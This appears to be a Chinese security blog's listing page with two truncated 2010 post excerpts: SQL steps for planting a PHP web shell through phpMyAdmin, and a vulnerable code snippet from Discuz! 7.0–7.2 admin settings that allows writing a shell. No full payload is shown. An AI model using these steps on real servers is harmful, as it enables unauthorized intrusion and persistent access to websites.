phpmyadmin拿shell

发布:admin | 发布时间: 2010年5月13日

首先:
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */

然后:
insert into shell(code) /* 插入数据到shell表中的code字段 */
values ('shell代码'); /* 值为shell代码 我用PHP一句话,看后面*/
...

标签:

Discuz!7.0-7.2后台settings.inc.php中写shell漏洞

发布:admin | 发布时间: 2010年2月5日

发布时间:2010-02-05
影响版本:
Discuz!7.0-7.2漏洞描述:
漏洞详情:
if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {
        $ucdbpassnew = $settingsnew['uc']['dbpass'] == '********' ? UC_DBPW : $settingsnew['uc']['dbpass'];
...

标签:

分页:«1»